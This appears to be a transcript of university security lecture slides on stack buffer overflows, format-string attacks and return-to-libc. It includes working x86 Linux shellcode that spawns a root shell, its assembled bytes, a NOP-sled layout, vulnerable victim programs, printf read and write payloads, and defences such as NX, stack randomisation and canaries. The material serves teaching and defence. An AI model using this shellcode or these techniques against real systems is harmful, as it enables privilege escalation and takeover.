stack smashing, printf, return-to-libc

96
Stack Smashing, printf, return-to- libc Francis Chang <[email protected]> Systems & Networking Lab Portland State University

Upload: kizzy

Post on 05-Jan-2016

101 views

Category:

Documents


1 download

DESCRIPTION

Stack Smashing, printf, return-to-libc. Francis Chang Systems & Networking Lab Portland State University. Up Until now. Any questions/comments about previous material / midterm?. start address = 0x0. Code. Data. New binary. - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: Stack Smashing, printf, return-to-libc

Stack Smashing, printf, return-to-libc

Francis Chang <[email protected]>

Systems & Networking Lab

Portland State University

Page 2: Stack Smashing, printf, return-to-libc

Up Until now

Any questions/comments about previous material / midterm?

Page 3: Stack Smashing, printf, return-to-libc

Process Address Space

Code

Data

BSS

Heap

Code

Data

BSS

Stack

Ptr to Args & Env

Arguments

Environment

Code

Data

BSS

start address = 0x0

0x4000000

New binary

Program interpreter (ld.so)

start_stack

0xC0000000

Page 4: Stack Smashing, printf, return-to-libc

Process Address Space

Code

Data

BSS

Heap

Code

Data

BSS

Stack

Ptr to Args & Env

Arguments

Environment

Code

Data

BSS

start address = 0x0

0x4000000

New binary

Program interpreter (ld.so)

start_stack

0xC0000000

What we’re interested in in this talk

Page 5: Stack Smashing, printf, return-to-libc

Stack Framevoid function(int a, int b){

printf( “hello” );

return;

}

void main() { function(1,2); // What happens here?

}

Page 6: Stack Smashing, printf, return-to-libc

Stack FrameHigher memory address

Lower memory address

Function parameters

Return address

Old base pointer (Saved Frame

Pointer)

Local variables

SFP

SFP + 8

addresses

Stack grows high to low

size of a word (e.g. 4 bytes)

Page 7: Stack Smashing, printf, return-to-libc

Stack FrameHigher memory address

Lower memory address

b

Return address

Old base pointer (Saved Frame Pointer)

Local variables….

SFP

SFP + 8

addresses

Stack grows high to low

size of a word (e.g. 4 bytes)

Calling void function(int a, int b)

a

SP

Page 8: Stack Smashing, printf, return-to-libc

Simple program

Return address

Old base pointer (Saved Frame Pointer)

int x

Buffer[4]..Buffer[7]

Stack grows high to low

size of a word (e.g. 4 bytes)

….void function(){ int x = 0; char buffer[8];

memcpy(buffer,“abcdefg”,8);

printf( “%s %d”, buffer, x );}

Output: ...

Buffer[0]..Buffer[3]

Page 9: Stack Smashing, printf, return-to-libc

Simple program

Return address

Old base pointer (Saved Frame Pointer)

int x 0x00000000

buffer[4..7] “efg”

Stack grows high to low

size of a word (e.g. 4 bytes)

….void function(){ int x = 0; char buffer[8];

memcpy(buffer,“abcdefg”,8);

printf( “%s %d”, buffer, x );}

Output: abcdefg 0

buffer[0..3] “abcd”

Page 10: Stack Smashing, printf, return-to-libc

Simple program2

Return address

Old base pointer (Saved Frame Pointer)

int x

Buffer[4]..Buffer[7]

Stack grows high to low

size of a word (e.g. 4 bytes)

….void function(){ int x = 0; char buffer[8];

memcopy(buffer, “abcdefghijk”,12);

printf( “%s %d”, buffer, x );}

Output: ...

Buffer[0]..Buffer[3]

Page 11: Stack Smashing, printf, return-to-libc

Simple program2

Return address

Old base pointer (Saved Frame Pointer)

int x 0x006b6a69

buffer[4..7] “efgh”

Stack grows high to low

size of a word (e.g. 4 bytes)

….void function(){ int x = 0; char buffer[8];

memcopy(buffer, “abcdefghijk”,12);

printf( “%s %d”, buffer, x );}

Output: abcdefghijkl 7039593

buffer[0..3] “abcd”

Page 12: Stack Smashing, printf, return-to-libc

Buffer Overflow

b

Return address

Old base pointer (Saved Frame Pointer)

Buffer[4]..Buffer[7]

Stack grows high to low

size of a word (e.g. 4 bytes)

aThe idea of a buffer overflow…

Trick the program intooverwriting its buffer…

Buffer[0]..Buffer[3]

Page 13: Stack Smashing, printf, return-to-libc

Buffer Overflow Stack grows high to low

size of a word (e.g. 4 bytes)

So now that we’ve messed upthe program’s memory, what canwe do?

1st: We have a bunch of memorywe can control. We can insertmalicious code.

But. How to execute that code?

Must change instruction pointer(IP)….

a

b

Return address

Old base pointer (Saved Frame Pointer)

Buffer[4]..Buffer[7]

Buffer[0]..Buffer[3]

a

Page 14: Stack Smashing, printf, return-to-libc

Buffer Overflow Stack grows high to low

size of a word (e.g. 4 bytes)

void function(int a, int b){

char buffer[8];

return;

}

Return statement: - Clean off the function’s stack frame - Jump to return address

Can use this to set the instructionpointer!

a

b

New Return addr

Old base pointer (Saved Frame Pointer)

Buffer[4]..Buffer[7]

Buffer[0]..Buffer[3]

a

Page 15: Stack Smashing, printf, return-to-libc

Buffer Overflow Stack grows high to low

The anatomy of a buffer overflow1) We can inject malicious code2) We can set the IP

So, put malicious code in the buffer,Set the return address to point to theshell code!

a

New Return addr

Shell Code

Shell Code

Shell Code

Page 16: Stack Smashing, printf, return-to-libc

Buffer Overflow Stack grows high to low

a

New Return addr

Shell Code

Shell Code

Shell Code

Reality Check: Looks great in theory, but not in practice…

We don’t know where the buffer is, so we don’t really know where the nor were the return address is…

We can approximate!

Page 17: Stack Smashing, printf, return-to-libc

New DiagramStack grows high to low

Buffer[0..256] [stuff]

More abstract (but more correct) pictureThese are the components we’re interested in

Returnaddr

[stuff]

Stack Frame

Page 18: Stack Smashing, printf, return-to-libc

Buffer OverflowStack grows high to low

Buffer[0..256] [stuff]

So the data we overwrite starts from here…

Returnaddr

[stuff]

Buffer Overflow (Injected Data)

Page 19: Stack Smashing, printf, return-to-libc

Buffer Overflow (Idealized)Stack grows high to low

Buffer[0..256] [stuff]

Ideally, this is what a buffer overflow attack looks like…

Returnaddr

[stuff]

Shell CodeNewAddr

Page 20: Stack Smashing, printf, return-to-libc

Buffer Overflow (reality)Stack grows high to low

Buffer[0..256] [stuff]

Reality #1: We don’t know where the Return address is. What do we do?

Returnaddr

[stuff]

Shell CodeNewAddr

Page 21: Stack Smashing, printf, return-to-libc

Buffer Overflow (Addr Spam)Stack grows high to low

Buffer[0..256] [stuff]

Solution – Spam the new address we want to overwrite the return address.

So it will overwrite the return address

Returnaddr

[stuff]

Shell CodeNewAddr

NewAddr

NewAddr

NewAddr

Page 22: Stack Smashing, printf, return-to-libc

Buffer Overflow (Reality)Stack grows high to low

Buffer[0..256] [stuff]

Problem #2: We don’t know where the shell code starts.

(Addresses are absolute, not relative)

Returnaddr

[stuff]

Shell CodeNewAddr

NewAddr

NewAddr

NewAddr

Page 23: Stack Smashing, printf, return-to-libc

Quick Peek at the shellcode

xor eax, eax

mov al, 70

xor ebx, ebx

xor ecx, ecx

int 0x80

jmp short two

one:

pop ebx

xor eax, eax

mov [ebx+7], al

mov [ebx+8], ebx

mov [ebx+12], eax

mov al, 11

lea ecx, [ebx+8]

lea edx, [ebx+12]

int 0x80

two:

call one

db '/bin/shXAAAABBBB'

Shell Code

This is real shellcode that works, (more detail later)

The problem is, we only have idea where it will end up in memory. So, where to put the instruction pointer?

Page 24: Stack Smashing, printf, return-to-libc

Quick Peek at the shellcode

xor eax, eax

mov al, 70

xor ebx, ebx

xor ecx, ecx

int 0x80

jmp short two

one:

pop ebx

xor eax, eax

mov [ebx+7], al

mov [ebx+8], ebx

mov [ebx+12], eax

mov al, 11

lea ecx, [ebx+8]

lea edx, [ebx+12]

int 0x80

two:

call one

db '/bin/shXAAAABBBB'

This is real shellcode that works, (more detail later)

The problem is, we only have idea where it will end up in memory. So, where to put the instruction pointer?

IP?

IP?

IP?

IP?

IP?

IP?

IP?

IP?

Page 25: Stack Smashing, printf, return-to-libc

The NOP Sled

xor eax, eax

mov al, 70

xor ebx, ebx

xor ecx, ecx

int 0x80

jmp short two

one:

pop ebx

xor eax, eax

mov [ebx+7], al

mov [ebx+8], ebx

mov [ebx+12], eax

mov al, 11

lea ecx, [ebx+8]

lea edx, [ebx+12]

int 0x80

two:

call one

db '/bin/shXAAAABBBB'

What happens with a mis-set instruction pointer?

Well, the shellcode doesn’t work…

IP?

IP?

IP?

IP?

IP?

IP?

IP?

IP?

Page 26: Stack Smashing, printf, return-to-libc

The NOP Sled

xor eax, eax

mov al, 70

xor ebx, ebx

xor ecx, ecx

int 0x80

jmp short two

one:

pop ebx

xor eax, eax

mov [ebx+7], al

mov [ebx+8], ebx

mov [ebx+12], eax

mov al, 11

lea ecx, [ebx+8]

lea edx, [ebx+12]

int 0x80

two:

call one

db '/bin/shXAAAABBBB'

New idea – NOP Sled

NOP = Assembly instruction (No Operation)

What a NOP instruction does:Advance instruction pointer by one, and do nothing else.

So, if we create a lot of them….

IP?

IP?

IP?

IP?

IP?

IP?

IP?

IP?

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

Page 27: Stack Smashing, printf, return-to-libc

Buffer Overflow (Reality)Stack grows high to low

Buffer[0..256] [stuff]

The anatomy of a real buffer overflow attack –

Now with NOP Sled!

Returnaddr

[stuff]

Shell CodeNewAddr

NewAddr

NewAddr

NewAddr

NOP Sled

Page 28: Stack Smashing, printf, return-to-libc

MotivationStepping back…

Motivation for our buffer overflow:We’re badWe have a unix accountWe want super-user access

So, we find a setuid program:Trick it into giving us a root shell

Page 29: Stack Smashing, printf, return-to-libc

MotivationStep 1: Locate a SETUID program with

a stack buffer that’s vulnerable to overflow.

(ie. Search for things that use strcpy ;)

Page 30: Stack Smashing, printf, return-to-libc

Sample Victim Programint main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

strcpy expects a null-terminated string

Roughly 500 bytes of memory we fit out shell code to

Page 31: Stack Smashing, printf, return-to-libc

Writing shellcode

Let’s discuss how to write some x86 shellcode for Linux

First, a primer on x86 assembly

Page 32: Stack Smashing, printf, return-to-libc

Registers

For our purposes: Four 32-bit general purpose registers:

eax, ebx, ecx, edx al is a register to mean “the lower 8 bits of eax”

Stack Pointer esp

Fun fact: Once upon a time, only x86 was a 16-bit CPU So, when they upgraded x86 to 32-bits... Added an “e” in front of every register and called it

“extended”

Page 33: Stack Smashing, printf, return-to-libc

x86 Assemblymov <dest>, <src>

Move the value from <src> into <dest>

Used to set initial values

add <dest>, <src>

Add the value from <src> to <dest>

sub <dest>, <src>

Subtract the value from <src> from <dest>

Page 34: Stack Smashing, printf, return-to-libc

x86 Assemblypush <target>

Push the value in <target> onto the stack

Also decrements the stack pointer, ESP (remember stack grows from high to low)

pop <target>

Pops the value from the top of the stack, put it in <target>

Also increments the stack pointer, ESP

Page 35: Stack Smashing, printf, return-to-libc

x86 Assemblyjmp <address>

Jump to an instruction (like goto)

Change the EIP to <address>

Call <address>

A function call.

Pushes the current EIP + 1 (next instruction) onto the stack, and jumps to <address>

Page 36: Stack Smashing, printf, return-to-libc

x86 Assemblylea <dest>, <src>

Load Effective Address of <src> into register <dest>.

Used to load data in memory into a register

int <value>

interupt – hardware signal to operating system kernel, with flag <value>

int 0x80 means “Linux system call”

Page 37: Stack Smashing, printf, return-to-libc

Goals of Shellcode

Goal: Spawn a root shell (/bin/sh)

It needs to:

1) setreuid( 0, 0 ) // real UID, effective UID

2) execve( “/bin/sh”, *args[], *env[] );

For simplicity, args points to [“/bin/sh”, NULL] and env points to NULL, which is an empty array []

Page 38: Stack Smashing, printf, return-to-libc

Interupt conventionint 0x80 – System call interupt

eax – System call number (eg. 1-exit, 2-fork, 3-read, 4-write)

ebx – argument #1

ecx – argument #2

edx – argument #3

Page 39: Stack Smashing, printf, return-to-libc

Shellcode Attempt #11st part:section .data ; section declaration

filepath db "/bin/shXAAAABBBB" ; the string

section .text ; section declaration

global _start ; Default entry point for ELF linking

_start:

; setreuid(uid_t ruid, uid_t euid)

mov eax, 70 ; put 70 into eax, since setreuid is syscall #70

mov ebx, 0 ; put 0 into ebx, to set real uid to root

mov ecx, 0 ; put 0 into ecx, to set effective uid to root

int 0x80 ; Call the kernel to make the system call happen

Page 40: Stack Smashing, printf, return-to-libc

Shellcode Attempt #12nd part:// filepath db "/bin/shXAAAABBBB" ; the string

; execve(const char *filename, char *const argv [], char *const envp[])

mov eax, 0 ; put 0 into eax

mov ebx, filepath ; put the address of the string into ebx

mov [ebx+7], al ; put the 0 from eax where the X is in the string

; ( 7 bytes offset from the beginning)

mov [ebx+8], ebx ; put the address of the string from ebx where the

; AAAA is in the string ( 8 bytes offset)

mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the

; BBBB is in the string ( 12 bytes offset)

mov eax, 11 ; Now put 11 into eax, since execve is syscall #11

lea ecx, [ebx+8] ; Load the address of where the AAAA was in the

; string into ecx

lea edx, [ebx+12] ; Load the address of where the BBBB is in the

; string into edx

int 0x80 ; Call the kernel to make the system call happen

Page 41: Stack Smashing, printf, return-to-libc

Shellcode problem #1It uses two segments – a data segment to store

“/bin/sh”

filepath db "/bin/shXAAAABBBB“mov ebx, filepath ; put the address of the string into ebx

Not cool. We don’t know where this code is going to be relocated. Can’t use a pointer in our buffer overflow!

Page 42: Stack Smashing, printf, return-to-libc

Shellcode Trick #1Observation:

1) The “call” instruction pushes the current instruction pointer onto the stack.

2) The “call” and “jmp” instructions can take arguments relative to the current instruction pointer

We can use this to get the of where our data is!

Page 43: Stack Smashing, printf, return-to-libc

Shellcode Trick #1Outline of trick:

jmp two

one:

pop ebx

[program code goes here]

two:

call one

db ‘this is a string’

Page 44: Stack Smashing, printf, return-to-libc

Shellcode Attempt #21st part:; setreuid(uid_t ruid, uid_t euid)

mov eax, 70 ; put 70 into eax, since setreuid is syscall #70

mov ebx, 0 ; put 0 into ebx, to set real uid to root

mov ecx, 0 ; put 0 into ecx, to set effective uid to root

int 0x80 ; Call the kernel to make the system call happen

jmp short two ; Jump down to the bottom for the call trick

one:

pop ebx ; pop the "return address" from the stack

; to put the address of the string into ebx

[ stuff here ]

two:

call one ; Use a call to get back to the top and get the

db '/bin/shXAAAABBBB' ; address of this string

Page 45: Stack Smashing, printf, return-to-libc

Shellcode Attempt #22nd part:// the pointer to “/bin/shXAAAABBBB” already in %ebx

; execve(const char *filename, char *const argv [], char *const envp[])

mov eax, 0 ; put 0 into eax

mov [ebx+7], al ; put the 0 from eax where the X is in the string

; ( 7 bytes offset from the beginning)

mov [ebx+8], ebx ; put the address of the string from ebx where the

; AAAA is in the string ( 8 bytes offset)

mov [ebx+12], eax ; put a NULL address (4 bytes of 0) where the

; BBBB is in the string ( 12 bytes offset)

mov eax, 11 ; Now put 11 into eax, since execve is syscall #11

lea ecx, [ebx+8] ; Load the address of where the AAAA was in the string

; into ecx

lea edx, [ebx+12] ; Load the address of where the BBBB was in the string

; into edx

int 0x80 ; Call the kernel to make the system call happen

Page 46: Stack Smashing, printf, return-to-libc

Shellcode Problem #2Looks like we have a working shellcode now!

But… remember how we’re inserting it?

strcpy( buffer, argv[1] );

NULL terminated string.

Let’s look at the assembled shell code.

Page 47: Stack Smashing, printf, return-to-libc

Shellcode Problem #2La Voila! Shellcode!

b846 0000 0066 bb00 0000 0066 b900 0000

00cd 80eb 2866 5b66 b800 0000 0067 8843

0766 6789 5b08 6667 8943 0c66 b80b 0000

0066 678d 4b08 6667 8d53 0ccd 80e8 d5ff

2f62 696e 2f73 6858 4141 4141 4242 4242

But all the nulls!

Where do all these nulls come from?

Page 48: Stack Smashing, printf, return-to-libc

Shellcode Trick #2aLoading up all the zeros in the registers for various

reasons…

mov eax, 0 ->

Causes 32-bits of 0’s to be written into our shellcode…

Page 49: Stack Smashing, printf, return-to-libc

Shellcode Trick #2aIdea! XOR of anything with itself gives us zero

mov ebx, 0 -> xor ebx, ebx

mov ecx, 0 -> xor ecx, ecx

mov eax, 0 -> xor eax, eax

12 nulls removed!

As a nice side-benefit, it’s 9 bytes shorter too!

But still, some remaining nulls…

Page 50: Stack Smashing, printf, return-to-libc

Shellcode Trick #2bWhere do the other nulls come from?

Must load eax registers with the syscall numbers (setreuid = 70, execve = 11)

mov eax, 70 ~= mov eax, 0x00000046

Idea: Set eax to zero with the last trick, and then overwrite the low-order byte

xor eax, eax

mov al, 70

Page 51: Stack Smashing, printf, return-to-libc

Final Shellcode1st part:; setreuid(uid_t ruid, uid_t euid)

xor eax, eax ; first eax must be 0 for the next instruction

mov al, 70 ; put 70 into eax, since setreuid is syscall #70

xor ebx, ebx ; put 0 into ebx, to set real uid to root

xor ecx, ecx ; put 0 into ecx, to set effective uid to root

int 0x80 ; Call the kernel to make the system call happen

jmp short two ; Jump down to the bottom for the call trick

one:

pop ebx ; pop the "return address" from the stack

; to put the address of the string into ebx

[stuff here]

two:

call one ; Use a call to get back to the top and get the

db '/bin/shXAAAABBBB' ; address of this string

Page 52: Stack Smashing, printf, return-to-libc

Final Shellcode2nd part:; execve(const char *filename, char *const argv [], char *const envp[])

xor eax, eax ; put 0 into eax

mov [ebx+7], al ; put the 0 from eax where the X is in the string

; ( 7 bytes offset from the beginning)

mov [ebx+8], ebx ; put the address of the string from ebx where the

; AAAA is in the string ( 8 bytes offset)

mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the

; BBBB is in the string ( 12 bytes offset)

mov al, 11 ; Now put 11 into eax, since execve is syscall #11

lea ecx, [ebx+8] ; Load the address of where the AAAA was in the string

; into ecx

lea edx, [ebx+12] ; Load the address of where the BBBB was in the string

; into edx

int 0x80 ; Call the kernel to make the system call happen

Page 53: Stack Smashing, printf, return-to-libc

Final ShellcodeAssembled:

31c0 b046 31db 31c9 cd80 eb16 5b31 c088

4307 895b 0889 430c b00b 8d4b 088d 530c

cd80 e8e5 ffff ff2f 6269 6e2f 7368 5841

4141 4142 4242 42

55 bytes!

/bin/shXAAAABBBB can be shortened to /bin/sh

46 bytes!

Page 54: Stack Smashing, printf, return-to-libc

Other things we could do..More tricks to shorten assembly:

Push “/bin/sh” onto the stack as immediate values, instead of using the call trick.

Shave off bytes, because not all instructions are the same size. Eg.

xor eax, eax -> push byte 70

mov al, 70 -> pop eax

4 bytes 3 bytes

Page 55: Stack Smashing, printf, return-to-libc

Other things we could do..More innocuous looking code

Construct an attack out of only ascii characters

Polymorphic code XOR encrypting Tools such as ADMutate

The result of that….%JONE%501:TX-3399-Purr-!TTTP\%JONE%501:-tKK4-gXn%-uPy%P-

8Jxn-%8sxP-dddd-777j-JdbyP-Uu%U-pp6A-At%RP-wwww-OO33-s9D

VP-r%O%-wDee-yDmuP-CCCC-%0w%-42e6P-H8z8-Y8q8P-jj4j-d9L%-

2658PPPPPPPPPPPPPPPP

Page 56: Stack Smashing, printf, return-to-libc

Other things we could do..Stack grows high to low

Buffer[0..256] [stuff]

Shell code has to fit between the buffer and the return address. What if the buffer is too small to fit shell code?

Another trick: Stick the shell code in an environment variable.

Returnaddr

[stuff]

Shell CodeNewAddr

NewAddr

NewAddr

NewAddr

NOP Sled

Page 57: Stack Smashing, printf, return-to-libc

Armed with shellcode nowNow that we have the shellcode, let’s revisit the

original problem:Stack grows high to low

Buffer[0..256] [stuff]

We have all the components.. Except…

How to set the new instruction pointer to poke at our NOP sled?

Returnaddr

[stuff]

Shell CodeNewAddr

NewAddr

NewAddr

NewAddr

NOP Sled

Page 58: Stack Smashing, printf, return-to-libc

Insertion addressHow to find the insertion address?

Well.. we guess.

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Page 59: Stack Smashing, printf, return-to-libc

Insertion address 1Guessing technique #1: GDB to find the stack

pointer!

$ gdb sample

(gdb) break main

Breakpoint 1 at 0x8048365

(gdb) run

Starting program: sample

Breakpoint 1, 0x08048365 in main ()

(gdb) p $esp

$1 = (void *) 0xbffff220

buffer probably near the stack top at this point

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Page 60: Stack Smashing, printf, return-to-libc

Insertion address 2Guessing technique #2: If compiled with debug

mode can pull off the address

$ gdb sample

(gdb) break main

Breakpoint 1 at 0x804836f

(gdb) run

Starting program: sample

Breakpoint 1, main (argc=0x1 <Address 0x1 out of bounds>, argv=0xbffffa84)at sample.c:5

5 strcpy( buffer, argv[1] );

(gdb) p &buffer

$1 = (char *(*)[500]) 0xbffff220

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Page 61: Stack Smashing, printf, return-to-libc

Insertion address 3Guessing technique #4: Add some debug

statements, hope that doesn’t change the address much

$ ./sample

0xbffff220

int main( char *argc, char *argv[] ) {

char buffer[500];

printf( “%d\n”, &buffer );

strcpy( buffer, argv[1] );

return 0;

}

Page 62: Stack Smashing, printf, return-to-libc

Things to keep in mindStack addresses bump around a little for no reason, depending on execution contexts. Randomize up and down by a few hundred bytes and cross your fingers

Intel x86 is little-endian. Least significant bytes come first.

1234567890 = 0x499602D2 -> D2 02 96 49

Shell code must start on a 4-byte boundary (Luckily, buffer start will be buffer aligned)

Page 63: Stack Smashing, printf, return-to-libc

Number of exploitsSome stats for you:

2002: 22.5% of security fixes provided by vendors were for buffer overflows

2004: All available exploits: 75% were buffer overflows

So removing buffer overflows important! 75% of exploits for stack smashes!

Page 64: Stack Smashing, printf, return-to-libc

Defending stack smashes 1So, how can we defend against stack smash

attacks?

Stop writing bad code!

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Bad code heuristic: grep *.c strcpy

Page 65: Stack Smashing, printf, return-to-libc

Defending stack smashes 2Hardware support.

In x86 there’s been no way to mark pages as containing executable code or not. (For compatibility)

This is why buffer overflows (and many other exploits) exist.

NX technology – No-eXecute bits to mark memory pages. (new, few months ago)

Page 66: Stack Smashing, printf, return-to-libc

Defending stack smashes 2NX bit – caveats

- Additional bookkeeping information required

- Only works in PAE 64-bit pagetable format

(Physical Address Extension mode)

(PAE is for machines to use more than 4GB of physical memory)

- Apporximately 6% overhead on system performance

- Redhat only uses it on SMP and hugemem kernels (not uniprocessor)

Page 67: Stack Smashing, printf, return-to-libc

Defending stack smashes 3Randomized stack pointer.

Most OS’s used to have pretty deterministic behaviour.

Intentionally randomizing stack pointer makes it harder to guess your insertion point.

MDK 10: No randomization

Redhat 8: 16KB of randomization (rooster!)

Fedora Core 3: 16MB of randomization

Page 68: Stack Smashing, printf, return-to-libc

Defending stack smashes 3Execshield for Linux

- randomizes the stack

- location of shared libraries

- start of program heap

PIE – Position Independent Executables

- GNU Compiler extension for ELF executables

- Allows binaries to be locatable anywhere in the address space

- (Used in conjunction with execshield)

Page 69: Stack Smashing, printf, return-to-libc

Defending stack smashes 4Segment limit approach

- Approximates the no-execute bit

- An option for PaX and ExecShield

- Plays tricks with segment registers

- 1st N megabytes of memory marked as non-executable

Page 70: Stack Smashing, printf, return-to-libc

Defending stack smashes 4

Code

Data

BSS

Heap

Code

Data

BSS

Stack

Ptr to Args & Env

Arguments

Environment

Code

Data

BSS

start address = 0x0

0x4000000

New binary

Program interpreter (ld.so)

start_stack

0xC0000000

Executable

Non- Executable

Page 71: Stack Smashing, printf, return-to-libc

Defending stack smashes 5Compiler extensions a la

stackguard

- Inserts a canary value into the stack

- Checks that canary is intact before returning from a function call

- Canary is randomized every time program is run

- Contains a NULL byte to prevent buffer overruns past the return address

Return address

Canary Value

Old base pointer (Saved Frame Pointer)

Local Variables

Stack grows high to low

F’n args

Page 72: Stack Smashing, printf, return-to-libc

What if…?What if the stack grew from low addresses to high

addresses? Wouldn’t this eliminate buffer overflow addresses, since we couldn’t write over the return address?

Well. No. If you think about strcpy(), there’s a return address on both sides of the buffer.

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

* Nobody seems to know why we grow buffers from high addresses to low addresses.

Page 73: Stack Smashing, printf, return-to-libc

Printf hacks

Page 74: Stack Smashing, printf, return-to-libc

Printf hacksprintf: C formatted output function

Relatives: sprintf, fprintf, saprintf, snprintf, vsprintf, vprintf, vfprintf, etc…..

int x = 42;

printf( “The value of X is, %d.\n”, x );

>> The value of X is 42.

Valuable observation: Mixes control codes and data! Whee, room for malware!

Page 75: Stack Smashing, printf, return-to-libc

Our printf victimNaïve program:

int main( int argc, char *argv[] ) {

printf( argv[1] );

return 0;

}

Unvalidated input! Time to stick in some malware!

Page 76: Stack Smashing, printf, return-to-libc

printf’s stack

printf argument 1

Pointer to format string

Return address

old base pointer

Stack grows high to low

size of a word (e.g. 4 bytes)

printf argument 2

printf( “%d %d”, arg1, arg2 );

local variables…

Page 77: Stack Smashing, printf, return-to-libc

Reading memory with printf

printf argument 1

Pointer to format string

Return address

old base pointer

Stack grows high to low

printf argument 2

Format specifier: %.8x – Print unsigned int

Can use this simple formatting to read off the values on the stack

int main(int argc, char *argv[]){printf( argv[1] );return 0;

}

$ ./printf %.8x.%.8x.%.8x%.8x%.8x.%.8x.%.8x%.8x.%.8x.%.8x%.8x.%.8x

61009d63.610097c0.00000000.0022ff40.61007549.00000002.615a06f4.0a010288.0022ff24.00000000.00000000.00000003

local variables…

Page 78: Stack Smashing, printf, return-to-libc

printf parameter accessLittle-known printf format specifier:

Can choose which parameter you reference!

printf(“%5$d %2$d”, 10, 20, 30, 40, 50, 60, 70, 80, 90);

>> 50 20

So now we can access any parameter down the stack!

Page 79: Stack Smashing, printf, return-to-libc

Feeding yourself addresses%s format specifier

String format -> Takes an address, and prints it out

char *pointer_to_string = “hello”;

printf( “%s”, pointer_to_string );

>> hello

What can we do with this?

Page 80: Stack Smashing, printf, return-to-libc

Feeding yourself addressesLooking at our victim code….

int main( int argc, char *argv[] ) {

printf( argv[1] );

return 0;

}

So we can feed in values in our format string since it’s on the stack.

What does this mean?

We can now read from arbitrary addresses with %s!

These values are stored on the stack!

Page 81: Stack Smashing, printf, return-to-libc

Writing memoryAnother Little-known printf format specifier:

Can write values with %n (number of characters written so far)

printf(“hello%n”, &my_int);

printf(“%d”, my_int);

>> hello5

So we can write small values into memory! (limited by length of our formatted output)

Using the trick of feeding ourselves addresses, we can write anywhere in memory now!

Page 82: Stack Smashing, printf, return-to-libc

Writing large numbersBut what if we want to write large numbers? Like

POINTERS.

Multiple, staggered writes, 1 byte at a time. Suppose we can write values 0-255 with no problem.

32-bit value 0x?? -> Little endian memory: ?? 00 00 00

Eg.

32-bit value 0x1A -> Little endian memory: 1A 00 00 00

Break it up into 4 1-byte writes.

Page 83: Stack Smashing, printf, return-to-libc

Writing large numbersExample: Suppose we want to write 0xAABBCCDD

into memory address 0x10000000.

Memory XX XX XX XX Address

First Write AA 00 00 00 0x10000000

Second Write BB 00 00 00 0x10000001

Third Write CC 00 00 00 0x10000002

Fourth Write DD 00 00 00 0x10000003

Result AA BB CC DD

Page 84: Stack Smashing, printf, return-to-libc

What’s handy about printf - Can get around all the no-execute flags on

memory, since there’s no execution code…

- Can read and write anywhere we want to from memory

Another trick in our handy arsenal of hacker weapons…

But how to use this in getting us a shell? .. More in a bit..

Page 85: Stack Smashing, printf, return-to-libc

Printf ProtectionGood programming practice:

Don’t ever do: printf( my_variable );

Use: printf( “%s”, my_variable );

Format Guard:

- Special compiler

- encodes parameters at compile time

- Can’t change the format at runtime

- Can have trouble with localized binaries, which have dynamically changing strings

Page 86: Stack Smashing, printf, return-to-libc

Return to libcIdea:

- We (the attacker) can manipulate the stack.

- The system may be clever, and not allow us to execute code on the stack.

- So… Let’s exploit existing code, called with our arguments

- libc is an attractive target, because it has very powerful functions, and is linked to by almost everything

(libc is the standard C library)

Page 87: Stack Smashing, printf, return-to-libc

Return to libcHow do we jump to libc code?

- Same as any buffer overflow exploit – overwrite a return address on the stack.

How do we figure out where to jump to?

- A libc function is always in the same place on a single system. Can figure out where it is by writing a simple test program, or using gdb.

Page 88: Stack Smashing, printf, return-to-libc

Return to libc

libc functions are called just like any other function

- push arguments on the stack

- push your return address onto the stack

- call the function

Since we’re exploiting a buffer overflow, this will appear on our stack

Stack grows high to low

Functionaddress

Functionreturn addr

Arg1 Arg2 Arg3…

Page 89: Stack Smashing, printf, return-to-libc

Spawning a shell system()

Suppose we want to call system(“/bin/sh”) to drop our shell. It might look like this

Since we’re exploiting a buffer overflow, this will appear on our stack…

(return addr is not important)

Stack grows high to low

system()address

returnaddr

pntr tostring

“/bin/sh”

Page 90: Stack Smashing, printf, return-to-libc

Spawning a shell system()

This drops a shell, but not a root shell.

Why? Have to setuid(0,0) self! Otherwise system() will drop our priveleges.

What to do?

Stack grows high to low

system()address

returnaddr

pntr tostring

“/bin/sh”

Page 91: Stack Smashing, printf, return-to-libc

Chaining return to libc calls

Need to call setuid(0,0) and then system(“/bin/sh).

Idea: Set the return address for when we call setuid() so when setuid() returns, it jumps to system(). Clever!

Stack grows high to low

setuid()address

system()addr

setuid()arguments

system()arguments

Page 92: Stack Smashing, printf, return-to-libc

Chaining setuid() & system()Still one tragic flaw (hamartia)

- setuid(0,0) has null bytes. We can’t write nulls if we’re doing a buffer overflow exploit.

What else can we do?

- Observation: execl(“/bin/sh”, “/bin/sh”, 0 ) can spawn root shell, without dropping out privileges.

- But it still has the “writing a null byte” problem

Page 93: Stack Smashing, printf, return-to-libc

Printf to the rescueRecall:

- If we have access to the buffer, we can use printf to read and write arbitrary data to arbitrary addresses.

- Idea: Use printf() to write the nulls we need for us!

- So: Chain printf() and execl()

Page 94: Stack Smashing, printf, return-to-libc

Chaining return to libc calls

1) Printf() executes and constructs the arguments we need for execl().

2) Printf() completes, and returns to execl() which now has proper arguments for spawning /bin/sh

3) We get our root shell.

4) Victory dance!

Stack grows high to low

printf()address

execl()addr

printf()arguments

execl()arguments

Page 95: Stack Smashing, printf, return-to-libc

Defending return-to-libcProblems:

- Especially brittle if we’re not sure where we are in memory

Defences:

- Randomizing pointers will help

- Canary values prevent buffer overflows

- Eliminate strcpy’s

Page 96: Stack Smashing, printf, return-to-libc

ReferencesHacking – the Art of Exploitation by Jon Erickson

New Security Enhancements in Red Hat Enterprise Linux v.3, update 3 By Arjan de Ven